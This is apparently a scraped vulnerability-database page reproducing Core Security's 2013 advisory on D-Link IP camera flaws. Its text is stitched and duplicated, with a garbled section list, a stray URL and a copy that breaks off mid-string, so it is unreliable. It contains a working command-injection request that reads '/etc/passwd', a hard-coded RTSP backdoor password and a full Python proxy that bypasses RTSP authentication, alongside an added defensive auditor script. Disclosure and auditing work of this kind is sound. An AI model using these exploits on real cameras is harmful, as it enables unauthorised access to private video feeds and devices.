[CVE-2013-1601] An ASCII output (the image luminance) of the live video
stream can be accessed by a remote unauthenticated attacker via:
/-----
http://192.168.1.100/md/lums.cgi
-----/
The following example is the output of a coffee pot video stream [2]:
/-----
O O O O O O O O O O O O O O O O O O O O O O O O O O o o o o o o o o o o o o
O O O O O O O O O O O O O O O O O O O O o o o O O O o o o o o o o o o o o o
O O O O O O O O O O O O O O O O O O . o O O o o o o o o o o o o o
O O O O O O O O O O O O o o O O o . o o o o o o o o o o o o o o
O O O O O O O O O O O O o o o o . o o o o o o o
O O O O O O O O O O o . o O O o . o o o o o o
O O O O O O O O O . o o o o o o
O O O O O O O O . o o o o o o o o
O O O O O O O . o O O o . o o o o o o o o o
O O O O O O o . O O O O O O . o o o o o o o o o
O O O O O O . O O O O O O O . o o o o o o o o o
O O O O O O o O O O O O O O . o . o o o o o o o o
O O O O O O o O O O O O O O . o o o . o o o o o o o o
O O O O O O o O O O O O O o . o O O o O O . o o o o o o o
O O O O O O . o O O O O O O o . O O O o O O . o o o o o o
O O O O O O . O O O O O o . O O o o O O o . o o o o o o
O O O O O O o O O O O O o . o O O o o O O o . o o o o o
O O O O O O O O O O O O . o O O o o O O o . o o o o o
O O O O O O O . o O O O o . o o o O o o O O o . o o o o
O O O O O O O o . O O O o . o o o O o o O O o . o o o o
O O O O O O O O . O O O . o o o O o o O O o . o o o o
O O O O O O O O O O O . o o o O o o O O o . o o o
O O O O O O O O o o O o o o o o O o o o O o . o o o
O O O O O O O O O . O o o o o o O o . o O o . o o
O O O O O O O O O . O o . o o o o O . o O o . o
O O O O O O O O O o o . o o o o o . o O o . o
O O O O O O O O O O . o o o . o . o O o .
o O O O O O O O O O . o o o . o . O o .
o o O O O O O O O O o . o o o . o . O o .
o o o O O O O O O O o . o o o . o . O o .
-----/
7.4. *RTSP Authentication Bypass*
[CVE-2013-1602] This vulnerability is triggered because:
1. Authentication is only present in DESCRIBE requests but not in
every subsequent request.
2. When the RTSP session is being established, the authentication
request of the current session is ignored (a previously stored response
is used instead).
The proof-of-concept below (a local TCP proxy placed between an RTSP
client and the camera) demonstrates this:
/-----
import sys
from socket import *
from threading import Thread
import time, re

LOGGING = 1

def log(s):
    if LOGGING:
        print '(%s) %s' % (time.ctime(), s)

class UDPRequestHandler(Thread):
    def __init__(self, data_to_send, recv_addr, dst_addr):
        Thread.__init__(self)
        self.data_to_send = data_to_send
        self.recv_addr = recv_addr
        self.dst_addr = dst_addr

    def run(self):
        sender = socket(AF_INET, SOCK_DGRAM)
        sender.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
        sender.sendto(self.data_to_send, self.dst_addr)
        response = sender.recv(1024)
        sender.sendto(response, self.recv_addr)
        sender.close()

class UDPDispatcher(Thread):
    dispatchers = []

    def __has_dispatcher_for(self, port):
        return any([d.src_port == port for d in UDPDispatcher.dispatchers])

    def __init__(self, src_port, dst_addr):
        Thread.__init__(self)
        if self.__has_dispatcher_for(src_port):
            raise Exception('There is already a dispatcher for port %d' % src_port)
        self.src_port = src_port
        self.dst_addr = dst_addr
        UDPDispatcher.dispatchers.append(self)

    def run(self):
        listener = socket(AF_INET, SOCK_DGRAM)
        listener.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
        listener.bind(('', self.src_port))
        while 1:
            try:
                data, recv_addr = listener.recvfrom(1024)
                if not data: break
                UDPRequestHandler(data, recv_addr, self.dst_addr).start()
            except Exception as e:
                print e
                break
        listener.close()
        UDPDispatcher.dispatchers.remove(self)

class PipeThread(Thread):
    pipes = []

    def __init__(self, source, sink, process_data_callback=lambda x: x):
        Thread.__init__(self)
        self.source = source
        self.sink = sink
        self.process_data_callback = process_data_callback
        PipeThread.pipes.append(self)

    def run(self):
        while 1:
            try:
                data = self.source.recv(1024)
                data = self.process_data_callback(data)
                if not data: break
                self.sink.send(data)
            except Exception as e:
                log(e)
                break
        PipeThread.pipes.remove(self)

class TCPTunnel(Thread):
    def __init__(self, src_port, dst_addr, process_data_callback=lambda x: x):
        Thread.__init__(self)
        log('[*] Redirecting: localhost:%s -> %s:%s' % (src_port, dst_addr[0], dst_addr[1]))
        self.dst_addr = dst_addr
        self.process_data_callback = process_data_callback
        # Create TCP listener socket
        self.sock = socket(AF_INET, SOCK_STREAM)
        self.sock.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
        self.sock.bind(('', src_port))
        self.sock.listen(5)

    def run(self):
        while 1:
            # Wait until a new connection arises
            newsock, address = self.sock.accept()
            # Create forwarder socket
            fwd = socket(AF_INET, SOCK_STREAM)
            fwd.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
            fwd.connect(self.dst_addr)
            # Pipe them!
            PipeThread(newsock, fwd, self.process_data_callback).start()
            PipeThread(fwd, newsock, self.process_data_callback).start()

class Camera():
    def __init__(self, address):
        self.address = address

    def get_describe_data(self):
        return ''

class DLink(Camera):
    # D-Link DCS-2102/1.06-5731
    def __init__(self, address):
        Camera.__init__(self, address)

    def get_describe_data(self):
        # Previously captured SDP body of a successful DESCRIBE response
        return '\x76\x3d\x30\x0d\x0a\x6f\x3d\x43\x56\x2d\x52\x54\x53\x50\x48\x61\x6e\x64\x6c\x65\x72\x20\x31\x31\x32\x33\x34\x31\x32\x20\x30\x20\x49\x4e\x20\x49\x50\x34\x20\x31\x39\x32\x2e\x31\x36\x38\x2e\x32\x2e\x31\x31\x0d\x0a\x73\x3d\x44\x43\x53\x2d\x32\x31\x30\x32\x0d\x0a\x63\x3d\x49\x4e\x20\x49\x50\x34\x20\x30\x2e\x30\x2e\x30\x2e\x30\x0d\x0a\x74\x3d\x30\x20\x30\x0d\x0a\x61\x3d\x63\x68\x61\x72\x73\x65\x74\x3a\x53\x68\x69\x66\x74\x5f\x4a\x49\x53\x0d\x0a\x61\x3d\x72\x61\x6e\x67\x65\x3a\x6e\x70\x74\x3d\x6e\x6f\x77\x2d\x0d\x0a\x61\x3d\x63\x6f\x6e\x74\x72\x6f\x6c\x3a\x2a\x0d\x0a\x61\x3d\x65\x74\x61\x67\x3a\x31\x32\x33\x34\x35\x36\x37\x38\x39\x30\x0d\x0a\x6d\x3d\x76\x69\x64\x65\x6f\x20\x30\x20\x52\x54\x50\x2f\x41\x56\x50\x20\x39\x36\x0d\x0a\x62\x3d\x41\x53\x3a\x31\x38\x0d\x0a\x61\x3d\x72\x74\x70\x6d\x61\x70\x3a\x39\x36\x20\x4d\x50\x34\x56\x2d\x45\x53\x2f\x39\x30\x30\x30\x30\x0d\x0a\x61\x3d\x63\x6f\x6e\x74\x72\x6f\x6c\x3a\x74\x72\x61\x63\x6b\x49\x44\x3d\x31\x0d\x0a\x61\x3d\x66\x6d\x74\x70\x3a\x39\x36\x20\x70\x72\x6f\x66\x69\x6c\x65\x2d\x6c\x65\x76\x65\x6c\x2d\x69\x64\x3d\x31\x3b\x63\x6f\x6e\x66\x69\x67\x3d\x30\x30\x30\x30\x30\x31\x42\x30\x30\x31\x30\x30\x30\x30\x30\x31\x42\x35\x30\x39\x30\x30\x30\x30\x30\x31\x30\x30\x30\x30\x30\x30\x30\x31\x32\x30\x30\x30\x43\x34\x38\x38\x42\x41\x39\x38\x35\x31\x34\x30\x34\x33\x43\x31\x34\x34\x33\x46\x3b\x64\x65\x63\x6f\x64\x65\x5f\x62\x75\x66\x3d\x37\x36\x38\x30\x30\x0d\x0a\x61\x3d\x73\x65\x6e\x64\x6f\x6e\x6c\x79\x0d\x0a\x6d\x3d\x61\x75\x64\x69\x6f\x20\x30\x20\x52\x54\x50\x2f\x41\x56\x50\x20\x30\x0d\x0a\x61\x3d\x72\x74\x70\x6d\x61\x70\x3a\x30\x20\x50\x43\x4d\x55\x2f\x38\x30\x30\x30\x0d\x0a\x61\x3d\x63\x6f\x6e\x74\x72\x6f\x6c\x3a\x74\x72\x61\x63\x6b\x49\x44\x3d\x32\x0d\x0a\x61\x3d\x73\x65\x6e\x64\x6f\x6e\x6c\x79\x0d\x0a'

class RTSPAuthByPasser():
    DESCRIBE_REQ_HEADER = 'DESCRIBE rtsp://'
    UNAUTHORIZED_RESPONSE = 'RTSP/1.0 401 Unauthorized'
    SERVER_PORT_ARGUMENTS = 'server_port='
    DEFAULT_CSEQ = 1
    DEFAULT_SERVER_PORT_RANGE = '5556-5559'

    def __init__(self, local_port, camera):
        self.last_describe_req = ''
        self.camera = camera
        self.local_port = local_port

    def start(self):
        log('[!] Starting bypasser')
        TCPTunnel(self.local_port, self.camera.address, self.spoof_rtsp_conn).start()

    def spoof_rtsp_conn(self, data):
        if RTSPAuthByPasser.DESCRIBE_REQ_HEADER in data:
            self.last_describe_req = data
        elif RTSPAuthByPasser.UNAUTHORIZED_RESPONSE in data and self.last_describe_req:
            log('[!] Unauthorized response received. Spoofing...')
            spoofed_describe = self.camera.get_describe_data()
            # Look for the request CSeq
            m = re.search('.*CSeq:\\s*(\\d+?)\r\n.*', self.last_describe_req)
            cseq = m.group(1) if m else RTSPAuthByPasser.DEFAULT_CSEQ
            # Create the response
            data = 'RTSP/1.0 200 OK\r\n'
            data += 'CSeq: %s\r\n' % cseq
            data += 'Content-Type: application/sdp\r\n'
            data += 'Content-Length: %d\r\n' % len(spoofed_describe)
            data += '\r\n'
            # Attach the spoofed describe
            data += spoofed_describe
        elif RTSPAuthByPasser.SERVER_PORT_ARGUMENTS in data:
            # Look for the server RTP ports
            m = re.search('.*%s\\s*(.+?)[;|\r].*' % RTSPAuthByPasser.SERVER_PORT_ARGUMENTS, data)
            ports = m.group(1) if m else RTSPAuthByPasser.DEFAULT_SERVER_PORT_RANGE
            # For each port in the range create a UDP dispatcher
            begin_port, end_port = map(int, ports.split('-'))
            for udp_port in xrange(begin_port, end_port + 1):
                try:
                    UDPDispatcher(udp_port, (self.camera.address[0], udp_port)).start()
                except:
                    pass
        return data

if __name__ == '__main__':
    if len(sys.argv) > 1:
        listener_port = camera_port = int(sys.argv[1])
        camera_ip = sys.argv[2]
        if len(sys.argv) == 4:
            camera_port = int(sys.argv[3])
        RTSPAuthByPasser(listener_port, DLink((camera_ip, camera_port))).start()
    else:
        print 'usage: python %s [local_port] [camera_ip] [camera_rtsp_port]' % sys.argv[0]
-----/
7.5. *RTSP Hard-Coded Credentials*
[CVE-2013-1603] The RTSP service contains hard-coded credentials that
effectively serve as a backdoor, which allows remote attackers to access
the RTSP video stream:
/-----
username: (any)
password: ?*
-----/
As we can see in the following dump, the submitted password is compared
with the string ':?*' (the character ':' is used for concatenation of
'username:password'). This code belongs to the binary 'rtspd':
/-----
.text:00011468 loc_11468 ; Load from Memory
.text:00011468 LDR R3, [R11,#s2]
.text:0001146C STR R3, [R11,#var_C0] ; Store to Memory
.text:00011470 LDR R2, [R11,#var_C0] ; Load from Memory
.text:00011474 LDR R3, [R11,#var_BC] ; Load from Memory
.text:00011478 ADD R3, R2, R3 ; Rd = Op1 + Op2
.text:0001147C SUB R3, R3, #3 ; Rd = Op1 - Op2
.text:00011480 STR R3, [R11,#var_C0] ; Store to Memory
.text:00011484 LDR R0, [R11,#var_C0] ; s1
.text:00011488 LDR R1, =asc_1B060 ; ":?*" <-------
.text:0001148C MOV R2, #3 ; n
.text:00011490 BL strncmp ; Branch with Link
.text:00011494 MOV R3, R0 ; Rd = Op2
.text:00011498 CMP R3, #0 ; Set cond. codes on Op1 - Op2
.text:0001149C BNE loc_114BC ; Branch
-----/
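Both RTSP findings above (the per-request authentication gap of 7.4 and the hard-coded password of 7.5) can be checked for in a captured RTSP exchange. The following auditor is an added example, not code from the Core advisory: it parses a constructed transcript (192.0.2.10 is a documentation address) and assumes the camera uses RTSP Basic authentication, which is consistent with the 'username:password' concatenation shown in the rtspd dump but is not stated outright.

```python
import base64

# Hard-coded RTSP password reported in section 7.5 (CVE-2013-1603).
BACKDOOR_PASSWORD = '?*'

def parse_rtsp_messages(transcript):
    """Split a raw RTSP transcript (both directions, in order) into messages.
    Each message is a dict with 'kind' ('request'/'response'), 'method' or
    'status', 'cseq', lower-cased 'headers' and the Content-Length body."""
    messages = []
    pos = 0
    while True:
        end = transcript.find('\r\n\r\n', pos)
        if end < 0:
            break
        lines = transcript[pos:end].split('\r\n')
        pos = end + 4
        headers = {}
        for line in lines[1:]:
            name, _, value = line.partition(':')
            headers[name.strip().lower()] = value.strip()
        body_len = int(headers.get('content-length', 0))
        body = transcript[pos:pos + body_len]   # skip an SDP body if present
        pos += body_len
        start = lines[0].split(' ', 2)
        msg = {'headers': headers, 'cseq': headers.get('cseq'), 'body': body}
        if start[0].startswith('RTSP/'):
            msg['kind'], msg['status'] = 'response', int(start[1])
        else:
            msg['kind'], msg['method'] = 'request', start[0]
        messages.append(msg)
    return messages

def decode_basic_credentials(header_value):
    """Return (username, password) from an RTSP 'Authorization: Basic ...'
    header value, or None if it is not Basic or not valid base64."""
    scheme, _, token = header_value.strip().partition(' ')
    if scheme.lower() != 'basic':
        return None
    try:
        decoded = base64.b64decode(token.strip()).decode('utf-8')
    except Exception:
        return None
    user, _, password = decoded.partition(':')
    return user, password

def audit_rtsp_session(transcript):
    """Report, per request, the two conditions from the advisory: a Basic
    credential using the hard-coded password, and a SETUP or PLAY that the
    server accepted (200) although the request carried no Authorization."""
    messages = parse_rtsp_messages(transcript)
    responses = {m['cseq']: m for m in messages if m['kind'] == 'response'}
    findings = []
    for req in (m for m in messages if m['kind'] == 'request'):
        auth = req['headers'].get('authorization')
        resp = responses.get(req['cseq'])
        if auth:
            creds = decode_basic_credentials(auth)
            if creds and creds[1] == BACKDOOR_PASSWORD:
                findings.append(('hardcoded-credential', req['method'], req['cseq']))
        elif req['method'] in ('SETUP', 'PLAY') and resp and resp['status'] == 200:
            findings.append(('unauthenticated-%s-accepted' % req['method'].lower(),
                             req['method'], req['cseq']))
    return findings

# Constructed capture (not from the advisory); 'YWRtaW46Pyo=' is the base64
# form of 'admin:?*', i.e. any username with the hard-coded password.
CAPTURE = (
    'DESCRIBE rtsp://192.0.2.10/play1.sdp RTSP/1.0\r\nCSeq: 1\r\n\r\n'
    'RTSP/1.0 401 Unauthorized\r\nCSeq: 1\r\nWWW-Authenticate: Basic realm="DCS-2102"\r\n\r\n'
    'DESCRIBE rtsp://192.0.2.10/play1.sdp RTSP/1.0\r\nCSeq: 2\r\n'
    'Authorization: Basic YWRtaW46Pyo=\r\n\r\n'
    'RTSP/1.0 200 OK\r\nCSeq: 2\r\nContent-Type: application/sdp\r\n'
    'Content-Length: 27\r\n\r\nv=0\r\nm=video 0 RTP/AVP 96\r\n'
    'SETUP rtsp://192.0.2.10/play1.sdp/trackID=1 RTSP/1.0\r\nCSeq: 3\r\n'
    'Transport: RTP/AVP;unicast;client_port=5556-5557\r\n\r\n'
    'RTSP/1.0 200 OK\r\nCSeq: 3\r\nSession: 12345678\r\n'
    'Transport: RTP/AVP;unicast;client_port=5556-5557;server_port=5556-5557\r\n\r\n'
    'PLAY rtsp://192.0.2.10/play1.sdp RTSP/1.0\r\nCSeq: 4\r\nSession: 12345678\r\n\r\n'
    'RTSP/1.0 200 OK\r\nCSeq: 4\r\nSession: 12345678\r\n\r\n'
)

if __name__ == '__main__':
    for finding in audit_rtsp_session(CAPTURE):
        print('%s (%s, CSeq %s)' % finding)
```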
8. *Report Timeline*
. 2013-03-19:
Core Security Technologies notifies the D-Link team of the vulnerability.
. 2013-03-20:
D-Link team asks for a technical description of the vulnerability.
. 2013-03-20:
Core sends a draft advisory with technical details and sets the estimated
publication date of the advisory for May 14th, 2013.
. 2013-03-20:
Vendor notifies that D-Link Corporation has an unpublished bounty
program for security advisors. The bounty program requires both Core
Security and D-Link to sign a memo of understanding (MoU).
. 2013-03-25:
Core notifies that receiving money from vendors may bias the view of the
report and rejects the bounty program.
. 2013-03-29:
Vendor notifies that they hope to close the fix ASAP.
. 2013-04-08:
Vendor sends the list of vulnerable devices and the associated firmware
and notifies that they will release patches and release notes on the
D-Link support forum first. Then, an official public release will be
announced (approx. 1 month from forum post to full release).
. 2013-04-24:
Core asks for a clarification regarding the D-Link release date and
notifies that releasing fixes to a privileged closed group and/or a
closed forum or list is unacceptable.
. 2013-04-25:
Vendor notifies that the patches are ready and scheduled for posting on
D-Link web site over the next few days.
. 2013-04-26:
Core notifies that the advisory is re-scheduled for Monday 29th.
. 2013-04-29:
Advisory CORE-2013-0303 published.
9. *References*
[1] http://www.dlink.com/us/en/home-solutions/view/network-cameras
[2] http://corelabs.coresecurity.com/themes/sample_theme/images/coffee-pot.png
10. *About CoreLabs*
CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://corelabs.coresecurity.com.
11. *About Core Security Technologies*
Core Security Technologies enables organizations to get ahead of threats
with security test and measurement solutions that continuously identify
and demonstrate real-world exposures to their most critical assets. Our
customers can gain real visibility into their security standing, real
validation of their security controls, and real metrics to more
effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted
research and leading-edge threat expertise from the company's Security
Consulting Services, CoreLabs and Engineering groups. Core Security
Technologies can be reached at +1 (617) 399-6980 or on the Web at:
http://www.coresecurity.com.
12. *Disclaimer*
The contents of this advisory are copyright (c) 2013 Core Security
Technologies and (c) 2013 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
13. *PGP/GPG Keys*
This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc
| VAR-202001-0840 | CVE-2013-1600 |
Authentication vulnerabilities in multiple D-Link products
Related entries in the VARIoT exploits database: VAR-E-201304-0137 |
CVSS V2: 5.0 CVSS V3: 5.3 Severity: MEDIUM |
An Authentication Bypass vulnerability exists in upnp/asf-mp4.asf when streaming live video in D-Link TESCO DCS-2121 1.05_TESCO, TESCO DCS-2102 1.05_TESCO, DCS-2121 1.06_FR, 1.06, and 1.05_RU, and DCS-2102 1.06_FR, 1.06, and 1.05_RU, which could let a malicious user obtain sensitive information. Multiple D-Link products contain an authentication vulnerability; information may be obtained. There are security vulnerabilities in multiple D-Link webcam products. Multiple D-Link webcam products have an authentication bypass vulnerability in the live video stream: an unauthenticated remote attacker can request 'http://192.168.1.100/upnp/asf-mp4.asf' directly and obtain the stream without authorization.
http://drupal.org/node/207891. *Advisory Information*
Title: D-Link IP Cameras Multiple Vulnerabilities
Advisory ID: CORE-2013-0303
Advisory URL:
http://www.coresecurity.com/advisories/d-link-ip-cameras-multiple-vulnerabilities
Date published: 2013-04-29
Date of last update: 2013-03-29
Vendors contacted: D-Link Corporation
Release mode: Coordinated release
2. *Vulnerability Information*
Class: OS command injection [CWE-78], Authentication issues [CWE-287],
Information leak through GET request [CWE-598], Authentication issues
[CWE-287], Use of hard-coded credentials [CWE-798]
Impact: Code execution, Security bypass
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2013-1599, CVE-2013-1600, CVE-2013-1601, CVE-2013-1602,
CVE-2013-1603
3. [CVE-2013-1599] to execute arbitrary commands from the
administration web interface,
2. [CVE-2013-1600] to access the video stream via HTTP,
3. [CVE-2013-1601] to access the ASCII video stream via image luminance,
4. [CVE-2013-1602] to access the video stream via RTSP,
5. [CVE-2013-1603] to bypass RTSP authentication using hard-coded
credentials.
4. *Vulnerable Packages*
The following is the list of affected devices and the associated
firmware (confirmed by D-Link). Other SKUs are probably affected too,
but they were not checked.
[CVE-2013-1599]
. DCS-3411/3430 - firmware v1.02
. DCS-5605/5635 - v1.01
. DCS-1100L/1130L - v1.04
. DCS-1100/1130 - v1.03
. DCS-1100/1130 - v1.04_US
. DCS-2102/2121 - v1.05_RU
. DCS-3410 - v1.02
. DCS-5230 - v1.02
. DCS-5230L - v1.02
. DCS-6410 - v1.00
. DCS-7410 - v1.00
. DCS-7510 - v1.00
. WCS-1100 - v1.02
[CVE-2013-1600]
. DCS-2102/2121 - v1.05_RU
. DCS-2102/2121 - v1.06
. DCS-2102/2121 - v1.06_FR
. TESCO DCS-2102/2121 - v1.05_TESCO
[CVE-2013-1601] and [CVE-2013-1603]
. DCS-3411/3430 - v1.02
. DCS-5605/5635 - v1.01
. DCS-1100L/1130L - v1.04
. DCS-1100/1130 - v1.03
. DCS-1100/1130 - v1.04_US
. DCS-2102/2121 - v1.05_RU
. DCS-2102/2121 - v1.06
. DCS-2102/2121 - v1.06_FR
. TESCO DCS-2102/2121 - v1.05_TESCO
. DCS-3410 - v1.02
. DCS-5230 - v1.02
. DCS-5230L - v1.02
. DCS-6410 - v1.00
. DCS-7410 - v1.00
. DCS-7510 - v1.00
. WCS-1100 - v1.02
[CVE-2013-1602]
. ALL mentioned devices and firmware.
5. *Vendor Information, Solutions and Workarounds*
D-Link announces that all patches are ready and scheduled for posting on
corporate web site for all customers [2013-04-25]. Contact D-Link for
further information.
6. *Credits*
[CVE-2013-1599], [CVE-2013-1600] and [CVE-2013-1601] were discovered and
researched by Francisco Falcon and Nahuel Riva from Core Exploit Writers
Team.
[CVE-2013-1602] was discovered and researched by Martin Rocha from Core
Impact Pro Team. The PoC was made by Martin Rocha with help of Juan
Cotta from Core QA Team.
[CVE-2013-1603] was discovered and researched by Pablo Santamaria from
Core Security Consulting Services.
The publication of this advisory was coordinated by Fernando Miranda
from Core Advisories Team.
7. *Technical Description / Proof of Concept Code*
7.1. *OS Command Injection*
[CVE-2013-1599] A security issue located in '/var/www/cgi-bin/rtpd.cgi'
allows an unauthenticated remote attacker to execute arbitrary commands
through the camera's web interface. The OS command injection is due to
this code in 'rtpd.cgi':
/-----
echo "$QUERY_STRING" | grep -vq ' ' || die "query string cannot contain
spaces."
. $conf > /dev/null 2> /dev/null
eval "$(echo $QUERY_STRING | sed -e 's/&/ /g')"
-----/
The first line of this snippet basically ensures that there are no
spaces in '$QUERY_STRING'. The last line uses 'sed' to replace
ampersands '&' with spaces, and then call to the function 'eval()',
resulting in a typical command injection. For example, in order to execute:
/-----
uname -a;cat /etc/passwd
-----/
the following request can be sent to the camera web interface:
/-----
http://192.168.1.100/cgi-bin/rtpd.cgi?uname&-a;cat&/etc/passwd
-----/
7.2. *ASCII Video Stream Information Leak*
[CVE-2013-1601] An ASCII output (the image luminance) of the live video
stream can be accessed by a remote unauthenticated attacker via:
/-----
http://192.168.1.100/md/lums.cgi
-----/
The following example is the output of a coffee pot video stream [2]:
/-----
O O O O O O O O O O O O O O O O O O O O O O O O O O o o o o o o o o o o o o
O O O O O O O O O O O O O O O O O O O O o o o O O O o o o o o o o o o o o o
O O O O O O O O O O O O O O O O O O . o O O o o o o o o o o o o o
O O O O O O O O O O O O o o O O o . o o o o o o o o o o o o o o
O O O O O O O O O O O O o o o o . o o o o o o o
O O O O O O O O O O o . o O O o . o o o o o o
O O O O O O O O O . o o o o o o
O O O O O O O O . o o o o o o o o
O O O O O O O . o O O o . o o o o o o o o o
O O O O O O o . O O O O O O . o o o o o o o o o
O O O O O O . O O O O O O O . o o o o o o o o o
O O O O O O o O O O O O O O . o . o o o o o o o o
O O O O O O o O O O O O O O . o o o . o o o o o o o o
O O O O O O o O O O O O O o . o O O o O O . o o o o o o o
O O O O O O . o O O O O O O o . O O O o O O . o o o o o o
O O O O O O . O O O O O o . O O o o O O o . o o o o o o
O O O O O O o O O O O O o . o O O o o O O o . o o o o o
O O O O O O O O O O O O . o O O o o O O o . o o o o o
O O O O O O O . o O O O o . o o o O o o O O o . o o o o
O O O O O O O o . O O O o . o o o O o o O O o . o o o o
O O O O O O O O . O O O . o o o O o o O O o . o o o o
O O O O O O O O O O O . o o o O o o O O o . o o o
O O O O O O O O o o O o o o o o O o o o O o . o o o
O O O O O O O O O . O o o o o o O o . o O o . o o
O O O O O O O O O . O o . o o o o O . o O o . o
O O O O O O O O O o o . o o o o o . o O o . o
O O O O O O O O O O . o o o . o . o O o .
o O O O O O O O O O . o o o . o . O o .
o o O O O O O O O O o . o o o . o . O o .
o o o O O O O O O O o . o o o . o . O o .
-----/
7.4. *RTSP Authentication Bypass*
[CVE-2013-1602] This vulnerability is triggered because:
1. Authentication is only present in DESCRIBE requests but not in
every subsequent request.
2. When the RTSP session is being established, the authentication
request of current session is ignored (a previously stored response is
used instead).
/-----
import sys
from socket import *
from threading import Thread
import time, re
LOGGING = 1
def log(s):
if LOGGING:
print '(%s) %s' % (time.ctime(), s)
class UDPRequestHandler(Thread):
def __init__(self, data_to_send, recv_addr, dst_addr):
Thread.__init__(self)
self.data_to_send = data_to_send
self.recv_addr = recv_addr
self.dst_addr = dst_addr
def run(self):
sender = socket(AF_INET, SOCK_DGRAM)
sender.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
sender.sendto(self.data_to_send, self.dst_addr)
response = sender.recv(1024)
sender.sendto(response, self.recv_addr)
sender.close()
class UDPDispatcher(Thread):
dispatchers = []
def __has_dispatcher_for(self, port):
return any([d.src_port == port for d in UDPDispatcher.dispatchers])
def __init__(self, src_port, dst_addr):
Thread.__init__(self)
if self.__has_dispatcher_for(src_port):
raise Exception('There is already a dispatcher for port %d'
% src_port)
self.src_port = src_port
self.dst_addr = dst_addr
UDPDispatcher.dispatchers.append(self)
def run(self):
listener = socket(AF_INET, SOCK_DGRAM)
listener.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
listener.bind(('', self.src_port))
while 1:
try:
data, recv_addr = listener.recvfrom(1024)
if not data: break
UDPRequestHandler(data, recv_addr, self.dst_addr).start()
except Exception as e:
print e
break
listener.close()
UDPDispatcher.dispatchers.remove( self )
class PipeThread(Thread):
pipes = []
def __init__(self, source, sink, process_data_callback=lambda x: x):
Thread.__init__(self)
self.source = source
self.sink = sink
self.process_data_callback = process_data_callback
PipeThread.pipes.append(self)
def run(self):
while 1:
try:
data = self.source.recv(1024)
data = self.process_data_callback(data)
if not data: break
self.sink.send( data )
except Exception as e:
log(e)
break
PipeThread.pipes.remove(self)
class TCPTunnel(Thread):
def __init__(self, src_port, dst_addr, process_data_callback=lambda
x: x):
Thread.__init__(self)
log('[*] Redirecting: localhost:%s -> %s:%s' % (src_port,
dst_addr[0], dst_addr[1]))
self.dst_addr = dst_addr
self.process_data_callback = process_data_callback
# Create TCP listener socket
self.sock = socket(AF_INET, SOCK_STREAM)
self.sock.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
self.sock.bind(('', src_port))
self.sock.listen(5)
def run(self):
while 1:
# Wait until a new connection arises
newsock, address = self.sock.accept()
# Create forwarder socket
fwd = socket(AF_INET, SOCK_STREAM)
fwd.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
fwd.connect(self.dst_addr)
# Pipe them!
PipeThread(newsock, fwd, self.process_data_callback).start()
PipeThread(fwd, newsock, self.process_data_callback).start()
class Camera():
def __init__(self, address):
self.address = address
def get_describe_data(self):
return ''
class DLink(Camera):
# D-Link DCS-2102/1.06-5731
def __init__(self, address):
Camera.__init__(self, address)
def get_describe_data(self):
return
'\x76\x3d\x30\x0d\x0a\x6f\x3d\x43\x56\x2d\x52\x54\x53\x50\x48\x61\x6e\x64\x6c\x65\x72\x20\x31\x31\x32\x33\x34\x31\x32\x20\x30\x20\x49\x4e\x20\x49\x50\x34\x20\x31\x39\x32\x2e\x31\x36\x38\x2e\x32\x2e\x31\x31\x0d\x0a\x73\x3d\x44\x43\x53\x2d\x32\x31\x30\x32\x0d\x0a\x63\x3d\x49\x4e\x20\x49\x50\x34\x20\x30\x2e\x30\x2e\x30\x2e\x30\x0d\x0a\x74\x3d\x30\x20\x30\x0d\x0a\x61\x3d\x63\x68\x61\x72\x73\x65\x74\x3a\x53\x68\x69\x66\x74\x5f\x4a\x49\x53\x0d\x0a\x61\x3d\x72\x61\x6e\x67\x65\x3a\x6e\x70\x74\x3d\x6e\x6f\x77\x2d\x0d\x0a\x61\x3d\x63\x6f\x6e\x74\x72\x6f\x6c\x3a\x2a\x0d\x0a\x61\x3d\x65\x74\x61\x67\x3a\x31\x32\x33\x34\x35\x36\x37\x38\x39\x30\x0d\x0a\x6d\x3d\x76\x69\x64\x65\x6f\x20\x30\x20\x52\x54\x50\x2f\x41\x56\x50\x20\x39\x36\x0d\x0a\x62\x3d\x41\x53\x3a\x31\x38\x0d\x0a\x61\x3d\x72\x74\x70\x6d\x61\x70\x3a\x39\x36\x20\x4d\x50\x34\x56\x2d\x45\x53\x2f\x39\x30\x30\x30\x30\x0d\x0a\x61\x3d\x63\x6f\x6e\x74\x72\x6f\x6c\x3a\x74\x72\x61\x63\x6b\x49\x44\x3d\x31\x0d\x0a\x61\x3d\x66\x6d\x74\x70\x3a\x39\x36\x20\x70\x72\x6f\x66\x69\x6c\x65\x2d\x6c\x65\x76\x65\x6c\x2d\x69\x64\x3d\x31\x3b\x63\x6f\x6e\x66\x69\x67\x3d\x30\x30\x30\x30\x30\x31\x42\x30\x30\x31\x30\x30\x30\x30\x30\x31\x42\x35\x30\x39\x30\x30\x30\x30\x30\x31\x30\x30\x30\x30\x30\x30\x30\x31\x32\x30\x30\x30\x43\x34\x38\x38\x42\x41\x39\x38\x35\x31\x34\x30\x34\x33\x43\x31\x34\x34\x33\x46\x3b\x64\x65\x63\x6f\x64\x65\x5f\x62\x75\x66\x3d\x37\x36\x38\x30\x30\x0d\x0a\x61\x3d\x73\x65\x6e\x64\x6f\x6e\x6c\x79\x0d\x0a\x6d\x3d\x61\x75\x64\x69\x6f\x20\x30\x20\x52\x54\x50\x2f\x41\x56\x50\x20\x30\x0d\x0a\x61\x3d\x72\x74\x70\x6d\x61\x70\x3a\x30\x20\x50\x43\x4d\x55\